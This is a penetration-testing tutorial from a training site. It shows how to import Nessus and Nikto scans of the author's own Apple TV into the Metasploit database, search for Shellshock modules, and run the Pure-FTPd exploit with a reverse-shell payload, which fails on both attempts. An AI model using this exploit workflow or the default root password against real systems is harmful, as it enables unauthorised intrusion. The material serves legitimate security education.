Using the Metasploit database (advanced)

September 1, 2015 | Views: 10677

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

In my first tutorial I demonstrated the basic usage of the Metasploit database. This included how to use nmap from within the Metasploit console, importing nmap scans and also how to display information in it.

Now we will look a bit deeper in what possibilities the Metasploit database can provide, and also see how it looks when importing database from other tools such as Nikto and Nessus. Those two tools are very popular. Nikto is used for scanning web applications and is free to use. Nessus comes in both a free version which is quite limited, but also a professional version that is quite powerful. In this demo, I will use the free version of Nessus and store the data in the Metasploit database.

Below you see the syntax for importing a previously saved Nessus scan result file into Metasploit. The Nessus file must be in the nessus format for Metasploit to be able to import it. In this example, I have done a credential scan of my jailbraked Apple TV just to highlight some of the vulnerabilities we can find with a Nessus scan.

First we switch to the test workspace from the basic tutorial where we already have some data stored.

msf > workspace test

[*] Workspace: test

msf >

Then we do the import from Nessus.

msf > db_import /root/Downloads/Apple_TV_scan_g5sugv.nessus

[*] Importing ‘Nessus XML (v2)’ data

[*] Importing host 192.168.1.11

[*] Successfully imported /root/Downloads/Apple_TV_scan_g5sugv.nessus

msf >

It is also possible to initialise Nessus scan from within Metasploit but that requires you to know the specific ID of the scan which you must have created within Nessus prior to calling Nessus from within Metasploit. So for this tutorial, I will stick with importing a Nessus scan.

If we run the hosts command again we now see the following:

msf > hosts

Hosts

=====

address       mac                name            os_name   os_flavor  os_sp  purpose  info  comments

——-       —                —-            ——-   ———  —–  ——-  —-  ——–

192.168.1.1   08:63:61:8e:8f:4e  homerouter.cpe  Unknown                     device

192.168.1.3   90:72:40:04:88:4b                  Unknown                     device

192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11    Mac OS X                    device

msf >

We have one more host, 192.168.1.11 which is my Apple TV box.

If we run services we see:

msf > services

Services

========

host          port   proto  name              state     info

—-          —-   —–  —-              —–     —-

192.168.1.1   22     tcp    ssh               open

192.168.1.1   8081   tcp    blackice-icecap   filtered

192.168.1.1   23     tcp    telnet            filtered

192.168.1.1   53     tcp    domain            open

192.168.1.1   80     tcp    http              open

192.168.1.1   443    tcp    https             open

192.168.1.1   631    tcp    ipp               filtered

192.168.1.1   3000   tcp    ppp               open

192.168.1.3   445    tcp    microsoft-ds      open

192.168.1.3   548    tcp    afp               open

192.168.1.3   139    tcp    netbios-ssn       open

192.168.1.3   10000  tcp    snet-sensor-mgmt  open

192.168.1.3   5009   tcp    airport-admin     open

192.168.1.11  5353   udp    mdns              open

192.168.1.11  3689   tcp    www               open

192.168.1.11  5000   tcp    rtsp              open

192.168.1.11  7000   tcp    www               open

192.168.1.11  7100   tcp    www               open

192.168.1.11  22     tcp    ssh               open

192.168.1.11  9777   udp                      open

192.168.1.11  123    udp                      open

192.168.1.11  62078  tcp                      open

192.168.1.11  63907  udp                      open

msf >

Now we can use the vulns command to see if there are any vulnerabilities that Nessus found and now are included in our Metasploit database. As this is the case with my Apple TV, I will only list some.

msf > vulns

 

[*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Backported Security Patch Detection (SSH) refs=NSS-39520

[*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Common Platform Enumeration (CPE) refs=NSS-45590

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Mac OS X < 10.10 Multiple Vulnerabilities refs=CVE-2011-2391

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Device Type refs=NSS-54615

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=OS Identification refs=NSS-11936

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Time of Last System Startup refs=NSS-56468

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Ethernet Card Manufacturer Detection refs=NSS-35716

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Authenticated Check : OS Name and Installed Package Enumeration refs=NSS-12634

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Apple TV < 7.0.3 Multiple Vulnerabilities refs=CVE-2014-3192

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple TV Detection refs=NSS-42825

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple iTunes Music Sharing Enabled refs=NSS-20217

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=HTTP Server Type and Version refs=NSS-10107

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=RTSP Server Type / Version Detection refs=NSS-10762

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Default Password (alpine) for ‘root’ Account refs=CVE-1999-0502,MSF-SSH User Code Execution,NSS-42367

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Protocol Versions Supported refs=NSS-10881

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SFTP Supported refs=NSS-72663

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Weak MAC Algorithms Enabled refs=NSS-71049

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server CBC Mode Ciphers Enabled refs=CVE-2008-5161,BID-32319,OSVDB-50035,OSVDB-50036,CERT-958563,CWE-200,NSS-70658

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Algorithms and Languages Supported refs=NSS-70657

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server Type and Version Information refs=NSS-10267

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection (HELP Request) refs=NSS-11153

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=mDNS Detection (Local Network) refs=NSS-66717

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Traceroute Information refs=NSS-10287

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=TCP/IP Timestamps Supported refs=NSS-25220

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Connection Information refs=NSS-64582

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Active Connections refs=NSS-58651

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272

msf >

As you can see, there are several and they are all related to the Apple TV I scanned with Nessus and imported the result into the Metasploit database. Vulnerabilities are of course very interesting and some of these might be able to exploit which is what Metasploit is all about. One thing to note here is the advantage to use multiple tools to find information and then store that data into Metasploit which is the premier attack tool for exploiting machines. In a sense, we get the best of two worlds.

Just as I said I would I also import my Nikto scan. Remember, you have to save your Nikto scan in XML format for Metasploit to be able to import it.

msf > db_import /root/nikto.xml

[*] Importing ‘Nikto XML’ data

[*] Importing host 192.168.1.1

[*] Successfully imported /root/nikto.xml

msf >

Unfortunately, Nikto was unable to detect any vulnerabilities in my web application so the vulnerabilities I listed below are the ones we can play with.

I will also mention that both the hosts and services command have several flags you can play with, allowing you to add a host (-a) and delete a host (-d). The help command allows you to see all the flags for a particular command as seen below.

msf > help hosts

Usage: hosts [ options ] [addr1 addr2 …]

OPTIONS:

-a,–add          Add the hosts instead of searching

-d,–delete       Delete the hosts instead of searching

-c <col1,col2>    Only show the given columns (see list below)

-h,–help         Show this help information

-u,–up           Only show hosts which are up

-o <file>         Send output to a file in csv format

-R,–rhosts       Set RHOSTS from the results of the search

-S,–search       Search string to filter by

-i,–info         Change the info of a host

-n,–name         Change the name of a host

-m,–comment      Change the comment of a host

-t,–tag          Add or specify a tag to a range of hosts

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

msf >

If we go back to out vulnerabilties we can also use the vulns command to search for specific vulnerabilities such as the infamous Shellshock vulnerability which was listed. We use the -S parameter with the vulns command as seen below. This only lists the vulnerabilties where “Shellshock” is listed.

msf > vulns -S shellshock

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823

[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385

msf >

In our next step, lets search the Metasploit exploit library to find a match. We use the builtin search command for this. As you can see, we get three matches.

msf > search shellshock

Matching Modules

================

Name                                      Disclosure Date  Rank       Description

—-                                      —————  —-       ———–

auxiliary/server/dhclient_bash_env        2014-09-24       normal     DHCP Client Bash Environment Variable Code Injection

exploit/multi/ftp/pureftpd_bash_env_exec  2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injection

exploit/multi/http/cups_bash_env_exec     2014-09-24       good       CUPS Filter Bash Environment Variable Code Injection

msf >

If you look closely you see that there is a PureFTPd bash exploit that is rated excellent and which also is listed a vulnerability from our previous search. This looks like a splendid candidate to try and exploit.

That brings us to the last step for this tutorial, to load data into the exploit settings directly from the information in the Metasploit database.

First, we select the PureFTPd exploit.

msf > use exploit/multi/ftp/pureftpd_bash_env_exec

msf exploit(pureftpd_bash_env_exec) >

We look at the options for this exploit and notice that we need to set the RHOST. This can be done by querying the Metasploit database.

msf exploit(pureftpd_bash_env_exec) > show options

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

Name   Current Setting  Required  Description

—-   —————  ——–  ———–

RHOST                   yes       The target address

RPATH  /bin             yes       Target PATH for binaries used by the CmdStager

RPORT  21               yes       The target port

Exploit target:

Id  Name

—  —-

0   Linux x86

msf exploit(pureftpd_bash_env_exec) >

Lets see if we can find the Apple TV machine in our database. With this exploit, you can see that there is no RHOSTS variable, only a RHOST variable. So, in this case it will not be possible to use -R flag with the hosts command to populate the RHOST variable with the search result. Many auxiliary modules do support the RHOSTS variable where this would work.

Example below of setting the RHOSTS variable.

msf exploit(pureftpd_bash_env_exec) > hosts -S Mac -R

Hosts

=====

address       mac                name          os_name   os_flavor  os_sp  purpose  info  comments

——-       —                —-          ——-   ———  —–  ——-  —-  ——–

192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11  Mac OS X                    device

RHOSTS => 192.168.1.11

msf exploit(pureftpd_bash_env_exec) >

However, using show options below do verify that the RHOST variable is not set as the command above is only possible when the RHOSTS variable is available. Unfortunately Metasploit will not output an error but instead simply output RHOSTS variable being set. So, always make sure to use show options to check that all your variables has been set.

msf exploit(pureftpd_bash_env_exec) > show options

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

Name   Current Setting  Required  Description

—-   —————  ——–  ———–

RHOST                    yes       The target address

RPATH  /bin             yes       Target PATH for binaries used by the CmdStager

RPORT  21               yes       The target port

Payload options (generic/shell_reverse_tcp):

Name   Current Setting  Required  Description

—-   —————  ——–  ———–

LHOST  192.168.1.6      yes       The listen address

LPORT  4444             yes       The listen port

Exploit target:

Id  Name

—  —-

0   Linux x86

msf exploit(pureftpd_bash_env_exec) >

So, we set the RHOST variable manually and run show options again.

msf exploit(pureftpd_bash_env_exec) > set RHOST 192.168.1.11

RHOST => 192.168.1.11

msf exploit(pureftpd_bash_env_exec) > show options

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

Name   Current Setting  Required  Description

—-   —————  ——–  ———–

RHOST  192.168.1.11     yes       The target address

RPATH  /bin             yes       Target PATH for binaries used by the CmdStager

RPORT  21               yes       The target port

Payload options (generic/shell_reverse_tcp):

Name   Current Setting  Required  Description

—-   —————  ——–  ———–

LHOST  192.168.1.6      yes       The listen address

LPORT  4444             yes       The listen port

Exploit target:

Id  Name

—  —-

0   Linux x86

msf exploit(pureftpd_bash_env_exec) >

OK, all set. If we are happy with the default payload we can simply execute the exploit attempt by entering either exploit or run.

msf exploit(pureftpd_bash_env_exec) > run

[*] Started reverse handler on 192.168.1.6:4444

[-] Exploit aborted due to failure: bad-config: 192.168.1.11:21 – Failed to store payload inside executable, please select a native payload

That did not work, and a little research tells us that there is a problem with the default payload option. So we select another payload an try to run the exploit again.

msf exploit(pureftpd_bash_env_exec) > set PAYLOAD linux/x86/shell_reverse_tcp

PAYLOAD => linux/x86/shell_reverse_tcp

msf exploit(pureftpd_bash_env_exec) > run

[*] Started reverse handler on 192.168.1.6:4444

[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.11:21).

msf exploit(pureftpd_bash_env_exec) >

Unfortunately it fails. Sometimes it is not as easy to exploit a machine as it might appear. Vulnerability scanners such as Nessus might be wrong, and exploits might fail.

Never the less, there is a great advantage in using the Metasploit database as a store for information you collect with other tools. Hopefully I have demonstrated some of the benefits of using the Metasploit database. There are things I have not demonstrated yet so feel free to really explore the different options with the Metasploit database.

I will leave you with two things. The first is -o flag which you can use with several of the database commands in Metasploit, you can try with services -o and hosts -o. This allows you to export data in CSV format which can be valuable. The last thing is the help command. Simply type help and you will get a list of all available commands, here is the section for the Metasploit database.

Database Backend Commands

=========================

Command           Description

——-           ———–

creds             List all credentials in the database

db_connect        Connect to an existing database

db_disconnect     Disconnect from the current database instance

db_export         Export a file containing the contents of the database

db_import         Import a scan result file (filetype will be auto-detected)

db_nmap           Executes nmap and records the output automatically

db_rebuild_cache  Rebuilds the database-stored module cache

db_status         Show the current database status

hosts             List all hosts in the database

loot              List all loot in the database

notes             List all notes in the database

services          List all services in the database

vulns             List all vulnerabilities in the database

workspace         Switch between database workspaces

The only thing that remains is to say Good Luck in using the Metasploit database.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
5 Comments
  1. it does work it seems that your interpreter doesn’t works

  2. thank’s man <3

  3. [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.11:21).

    Same Problem anyone have solution

  4. Much appreciated

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel